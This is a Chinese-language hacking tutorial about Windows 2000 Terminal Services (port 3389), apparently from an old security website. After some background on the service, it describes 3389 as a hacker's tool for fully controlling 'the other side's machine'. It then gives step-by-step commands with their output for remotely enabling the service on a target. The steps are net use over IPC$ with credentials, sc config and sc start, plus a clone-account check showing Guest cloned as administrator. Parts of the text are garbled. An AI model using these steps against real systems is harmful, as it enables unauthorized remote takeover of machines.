引言 WIN系统NT版本以上提供了
项特殊
服务—终端服务在网络上熟成3389服务有些读者肯定会说:不就是3389输入法漏洞吗?都知道啊这句话是大错特错3389不是输入法漏洞3389并不定是有输入法漏洞,它是windows个正常服务而已,只是没有打上补丁而开3389(终端服务)端口,可以利用输入法漏洞来入侵,但是现在这种漏洞已经很少了.但真正全面了解终端服务却是少的又少这里我将带大家全面了解使大家在网络安全方面扫平个障碍
2
终端服务概念 终端服务概述
终端服务提供了通过作为终端仿真器工作
“瘦客户机”软件Software远程访问服务器桌面能力终端服务只把该
用户界面传给客户机客户机然后返回键盘和鼠标单击动作以便由服务器处理每个用户都只能登录并看到它们自己会话这些会话由服务器操作系统透明地进行管理而且和任何其他客户机会话无关客户软件Software可以运行在多个客户机硬件设备上包括计算机和基于 Windows 终端其他设备如 Mac
osh 计算机或基于 UNIX 工作站也可以使用其他第 3方软件Software连接到终端服务器 终端服务可以在应用服务器模式或远程管理模式下在服务器上进行配置
作为应用服务器终端服务提供了种有效而可靠方式通过网络服务器分发基于 Windows 在应用服务器模式下终端服务为可能无法正常运行 Windows 计算机显示 Windows 2000 桌面以及目前基于 Windows 大多数应用在远程管理模式下使用时终端服务提供了远程访问能力使您可以从网络上任何地方虚拟地管理您服务器 终端服务有以下好处:
更快地显示 Windows 2000
桌面终端服务架设了座从旧式桌面迁移到 Windows 2000 Professional 桥梁为非计算机桌面以及需要进行硬件升级才能在本地完全运行 Windows 2000 操作系统计算机提供了种虚拟 Windows 2000 桌面环境终端服务客户可用于多种区别桌面平台包括 MS-DOS、基于 Windows 终端、Macosh 和 UNIX(和 MS-DOS、Macosh 和基于 UNIX 计算机连接需要附加软件Software) 充分利用已有
硬件终端服务扩展了分布式计算模型允许计算机同时作为瘦客户机和具有完整功能个人计算机操作当计算机在现有网络上时可以继续使用同时也可作为能仿真 Windows 2000 Professional 桌面瘦客户机使用 集中配置使用运行在 Windows 2000 Server 上终端服务所有执行、数据处理以及数据存储都在服务器上进行得以集中配置终端服务可确保所有客户机都能访问当前版本软件Software只能在服务器上安装次而不能安装在您单位每个桌面上这样可减少单独更新计算机所花费成本 远程管理
终端服务提供了对 Windows 2000 Server 远程管理为系统管理员提供了从任何客户机通过广域网或拨号连接远程管理其服务器种思路方法 黑客为什么喜欢终端服务:
主要是终端服务有3个特性:
易于使用
可管理性
安全性
这3个特性决定了它在网络界
地位它比任何个木马动能都强大
有了它你就等于完全控制了对方机子样可以完全在上面完成本机完成切入侵任务(只要你网速够快) 但是这里还是要不厌其烦
声明次:3389只是个服务不是什么漏洞你扫到了3389端口并不代表你就可以入侵它只能介绍说明对方开了终端服务 3
有关开启终端服务 利用工具开3389
我就不想多说了这样开没多大技术性这里我主要介绍不用任何工具开3389两种思路方法 1
利用SC开启对方终端服务 首先先辨别对方是不是2000SERVER
可以用小容CCA炊苑降挠没В绻蠺sInternetUser这个用户9成为SERVER C:\>cca \\192.168.0.29 dudu dancewithsnow
Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, [email protected]
Connect 192.168.0.29 ....OK
Prepairing ....OK
Processing ....OK
Checking ....
Check Result:
[DuDu] AS SAME AS [administrator]
[Guest] AS SAME AS [administrator]
[IUSR_RONG] AS SAME AS [administrator]
[IWAM_RONG] AS SAME AS [administrator]
[TEST] AS SAME AS [administrator]
[xr] AS SAME AS [administrator]
很明显这个不是SERVER
接着看使例: C:\>net use \\xxx.xxx.xxx.xxx\ipc$Content$nbsp;"password" /user:"name"
第
步检查对方是否真禁用了Terminal server C:\>sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\
32\termsrv.exe LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : Local
仔细看 START_TYPE
项显示对方该服务启动模式为“DISABLED”也就是“禁用” 第 2步
更改对方终端服务启动模式 C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
[SC] ChangeServiceConfig SUCCESS
好了
现在我们已经把对方终端服务启动模式修改成自动了 第 3步
再检查便对方终端服务启动模式 C:\>sc \\TEST qc termservice
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\
32\termsrv.exe LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : Local
仔细看 START_TYPE
项显示对方该服务启动模式为“AUTO_START”也就是“自动” OK
第 4步
启动对方终端服务 C:\>sc \\xxx.xxx.xxx.xxx start termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
C:\>sc \\xxx.xxx.xxx.xxx query termservice
SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
到这里
对方3389就在命令行下被启动了篇文章: 用W32DASM破解Macro MagicV4.1p时间限制篇文章: 没有了
最新评论